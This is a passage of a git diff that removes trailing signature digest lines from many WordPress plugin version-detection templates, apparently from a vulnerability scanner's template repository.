regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022079cfce8860376984c9ef6642f28249d8c7d1f77870fbd0a6d742305f83692cd2022049fa42eeb87e6c33bdd3a91a644878b7f6eb414039a88b2f4b2dac524d8bf77f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 622b0da8b7..8c49a34259 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204d10f697cf59e24dbb1f85b21ab03a5dc5df804aad70cb08a474d70f3dcae10902205310bd5f0321e3008dd9119724865be76306e0e90eaad721ca739d5932c1853d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index 52d3e6f22b..6ac2212b4b 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204a6fe30593bc9278aa80e0f00fb16d6cd484c380fdf099c319e4958694537d21022100cd474609d4ac97c93fbf7dcbbd1bb9b559110ae69ccffac0214ccab6aa275ea1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index 881ea912b0..71c71b5ed1 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d24a0125b55553a0535641477ea5db735d199ae3f148d534143dec1b139051bb02210090ccb6e9384c25dea0aef1369ad9e8baeb0150ec81bbd309a30acc0274103911:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index d6f191b290..7b47adc274 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220427bb597849241945c6cbc4eefa7f733e172f424a1d7cde3d381923291abf9cb022055ca32ec1eab60b64abef460e6d1e93816bad548222fd9eb4efc09cf3ee68ef7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/templately.yaml b/http/technologies/wordpress/plugins/templately.yaml index 0c2dea4c7d..286dfdaec6 100644 --- a/http/technologies/wordpress/plugins/templately.yaml +++ b/http/technologies/wordpress/plugins/templately.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022048d55df795c346b3bc98c6a4b3ea9af6454362cb9bf6fdd386d43b9986969cb402210094a46acdfacb36a69fef1a312ec08196801f8321fb36f2ac808d77248d5c22aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index eb106c4fe7..c4928059f6 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206d4ffeb8f4b4257d3218d601c4f73ca4da75905af404ba74203ec9efdbcb4de3022100f4e152ccd146b34a8856f6477ff28e2895b9272ea17536b336d475ab7affb6cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index 5feb7ca782..f6a7836f35 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008ba7f3c7fee4d8781616f5097833b4372300eac891d0b2efbaa95c9778a03bf60220752415dc518f70379cdefcff5ec7c06fb08f9c1415fbaae3d2ad97c45722fc78:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index cc0c7bf109..b7af708c4f 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220022e5c7bb721e771b4a894fe930fb63a467ad47dd74a5298e0841ef510a51eee022100c504794b56a01deac710cc2aea7dec2453654ab77df9fb2ec85193a1abf83c7b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 8d13a363df..61a793edf7 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a7ca6e6adf1414274538f515126374d93e9ac9744163c1be1c729212a650bc7f022060f26d14e74b4ad0cfc2c19fd8fd70264cfa00272908278d01ee3b9bdab9cfd7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index 0ed4132adf..0da88d5d3f 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210098bdce552e8c838567c2d3425e3be57d57a9318e13082bb01cf40fe964b6aef1022100b4235ad8ddf6342a193f99978fb5745d491c2be902f962bc722c0fc6c1488bcd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index d6db931058..2b29428cf1 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203809f656a09424d6e98ea44d80c649ab30976e5ff7ce036a85d1e25d4145cee50220569db2db19d9090cbca314d570c122d38a3974fe8c7bbf055be00a80d69025f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index b7120ce4ad..181e619a7c 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100cecd7efdcda44b6c450e3f018869926c19aeafcbbb2dd52506daddf52500909502202b3918555aa56d1e2d2d3dc5a30cd77a32cff2c5212f59815312dad68fea1055:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index de557b9b98..8164eb4483 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b23d869b1de1a151875d112ba774717df3bc98c2e9eaf8b6dfedc8a0bb82fa66022100abe67c6aa5e9431c5ac46e135fc5f6b5532a00ddf8f3063770a0b96fed1a6100:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index e73b2a60fe..59554defdf 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100bfff151617b7e195ad148ceb53325f3319058d118d0823a96341e1497bbd7d00022061f401fa790765535b06514f64acb922cd6d9f6dae778a22599a66feeec94cf4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index ef02198b1a..350fd9436b 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205d5a52aa5d5585a28958d66395375ccac841cf8f30044d5e555f9318f02d6d2e022100d378df13c03de2672b933a163d878ba337873f0931f15c72f2a1826925f510d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index 4f944b59eb..2ae6bafbba 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201830b4051da2cd9d5d3e392af6fd31aae70e574dda6ffd73394285da54cda143022100fa5d5acefe9b7888e833bc2748b759fe7d2affa891d24a49c63cc62cb9e166c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index 1b7ce5a32f..d0dc8d92bb 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022037d4a355563051862cd41498ba0d6e6a290fa2a42bfa89222b1f1c528f52f27602205af791958078740e5bc2800d3c221593551db8d09db304d8f5378cbace00c94b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index 8563609e57..c49bbc2b6d 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204cf0ef11ee4ceec7f14807357ff6f6bcf1f6c834ece10736d8ee293f79e4535e022100db4f41c11ad2a4e1c3c41ced2a6c20d84d4c14b6a254b85ba1c2baaa623600ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index e163f2412f..27586cbd9d 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a60481802645d4de48451f23f54dd0bdf7f19f9a08d6d7935bf9622ef9a056b002206b490e6ddbd70719c7941b6425d6ff65be2c5e6d5ab27f2bbb30789a14010846:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index ba9f587922..946272f0a9 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f7d708e9176b4c275a0b1020e6e0d6276400d43a222104bfd06ed50731e261f1022100dad340015bc5190c15c2de4995bd19c4da6fbb7c34f569a655e7e8643e411cbf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml index a364017f9d..aa29706872 100644 --- a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022012b1de9a32890dbd47f4da7ca49bade4184250f64d362eb9406f3cb8db36aeff022055ebf18dfe455865489273337fa3b2096d63d1e78e4b93c577eac591ce9dea86:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 4041a36e9d..290d53ab7e 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022077c305678d1bdee41320069bc09368a95821df545e02d27026952d097fe8a0b5022065cea90faf194e944a797f5e0c0d641b2c9e869b6d35a48f2783e67c06baa90a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index 7b8dd95096..f7c9ef9b1f 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b01dd1e7fbabc9f5f9b5233cd47436df6c662da642efb51fd8e56aafc678b26d022100eded69d500b3209a28e2959cff4f7dfbb8218c721898a332ae00f99b2f8a620d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index be52129b15..f1c16275a2 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008e1e3ba1c9f17b178821015798bf08418df4e9682690f372cbb48173a8ab0d3f022100f77cb4ef40aed820987a62cc99a6461178b7d446cf7b471b359a34c017f61d69:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index 3fa3a07f30..fc072e19d8 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c8e37dc85011e228c30f2724d1a924bed7f6d3127acbd57a8f1d3eaec70e2a1d022100b621ad6b9ea0788d12108abedfeb90038c1dc9a80f58c76abb2249b8ce2ffee0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index 3ab5130976..da9df0e8a5 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022070b248f62913767ed7cb6a498df930d8b8463d1fa4550f7c02680bf41c4dcb90022067cbb3ce6034143bdbbad6895192662a951483b35d78a929a019a94c60d4cab6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index 34d3d4012c..f8113d9750 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100804f43211506eca2fefeec1bb91c02881cd90188b6b2f0ba95322df2f8ba0657022100b42a6e6d3b0a1efb62a0a294806525a146a52eb9dbada36c2a92f662acfc7128:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index aee4742c93..5f80282ab2 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a8ae0d8323d19f7cc8fa8e4fa4358f013687faf374a245003b5a9efb4c2ebf15022100da713fdc6e46b104adb361dbc98f0c91eb657d7d63a7ae68565425ad50d594f7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index e0888cab6d..5725d5bb3f 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202aa1afe30335597c01f7120b74978fde16271bf83e83fec54d1c8443b4866f4b022100c74ee5d8b0aec5219308cabe8df1033c93c0725172475c07be95f9ef0fc2a08e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index be1ab27493..f67a8bc18a 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d2b2165c8cdb42cc8aa136b48bad12427c04cf774aaf35d344ab73de8a5a3206022100f886f573dc71b5fec3e843c31acef53e4718aad9b4253d34c659c592dfe8dae7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-crontrol.yaml b/http/technologies/wordpress/plugins/wp-crontrol.yaml index 2d7343fd72..a773829b7d 100644 --- a/http/technologies/wordpress/plugins/wp-crontrol.yaml +++ b/http/technologies/wordpress/plugins/wp-crontrol.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220387de0d3f1ad8b80a64fe54b57d38d82269f592568f2085750166b3b3ae733fb02205a6058388bd9d00be7adb3df1d511ea79b4d4dd94c6df2e7ba6d8ceb9c9a8dfa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index 74ced41fe5..b9bd4be0a8 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220029a7dc886a2d242ac122b328a4c324db09c68fb3f4f8439322ce8ab01bcaebb022100d470f42552339724e0c27eaa9a08efc9ca60a5fb52f31ec64f086c5e465c38f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index 4f8d7a20b3..bece4ce486 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c14a7fbbc7448216fdc462aba4d8728d09821473ea8e4f621999a3d944cc4f3e022100b673c2949b1097fb8a41ba3d3c3e5517effdfba1e828fb27fd2bd6a12c64c5ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index 259238caf4..138b0aa9a6 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022029006fcb84c4028bb984af1ea352ef361a2aa44aeabb65b22ec14958130f066b022100b07261ee971eda6a1d50aedbc1d6699f9eab3f90d1ad3e009985c84d9a06b450:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index eb93039ba8..68bf71bc83 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210087c98a2bd947b8831375272d0ec72ccea9f52dc9fc9d5d965b8c30e9b26dbf150221008714b417cda861923b9af2af020d01507334e59e7ed84fc6be46dccc2f9471da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index 5e18601bda..10dad2d2fb 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022016bd46aa521718af97762ec502986c3883ee15249ef2763cd06cd322f688c14e022100bfb24b6f8494f3181d14303b9e9193c074ba6a67294cf112031e22de6ae2b0c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index 53ebbf25ff..e9efe6fb53 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202d84743f6682e80baaf81460cef73655c511e83e24b683eded24e5784dae3b2402210084abc85a0c71cb8901c32ec2bd2111b7040466eee8df7189a3e53597e7475bb2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index a78a3d2d62..c3d10f0135 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100cb23fee7537efa51c063e2e2fa8bf673bb2d028b17a3b56b6291a0db9cbf85d2022007918404d31cc313c68ce2ad5b8ceb42c59bf49f41741db2c12d719682223129:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index f91aa3fd19..4a8bc6b75c 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d22363a61c810133850b37d6a07158ed860fc19c46b38790a2d55ec1d6e9d2800220477cb63afc8141bdc49f05b11f4b10881999da6b730ead884a28651702e0391b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index 4cf724bb2a..d2c74355bd 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f584875adaa90c4f626cd10fbb365787c33cf25789af6ba2f8d3b79f149c746502203431c10eb81a033d3bae2c8516d314b300224afa91841034aea937edb9318a3d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index 8bf4cd5ef0..94b8494b08 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100dba8d7d5401a1dcc01428d3253409561c4042c9be0800543335303b19153df7a022100e526a12674a6254bfafb4b0758702afe69166528d2cccf65e48b182478d1ad3f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index 22d76f4f1e..108aba79e9 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220463051a801241ef38cb6df13c096d3f1601ff1ee7c284f1c7497c92b43475bed02207893c3905fddcbf98b60a0b60c54ff7540f5faa0fa93a380f8fad8fcd58ca745:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index 83194d2ed9..f6f6bf5566 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e93550ca085b48e0c7f86097fa880371dfaccf185182cf9584ab625c0d7d590d022100c8721cba4d892376781af0bda91bdc1481a1d4528f3bc7160d917be8af4e031b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index bebe0d3bb7..483cb7cac7 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022014def1a1dbe60b207185fcceb40b12adae41df49414a7588d53759db7c65f38f022040433f6086ae52cce28c05eff785f34b684aadc10da8cbdc0ccd5aef095b5f1c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index 6feefdbb8b..a132c98df4 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205d0ca36cd1a3e7c839daefc89e2f7719b09b5ff53b989bd279f382a4060c00a5022100dcf4e6bd2322fd7bcc92c6c9a5e592e6e6123422f6dcbcf6620007517a014359:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index e95e716ec9..135bbee046 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b0ac62a80d98aec12dc44ef273acd4365684c0752a23f049cc200409ddcbb49a0221008ece8a9e5b9d527724977bc2fc8e14e91debceb339398ec4c7c49472e1d80b3b:922c64590222798bb761d5b6d8e72950 \ 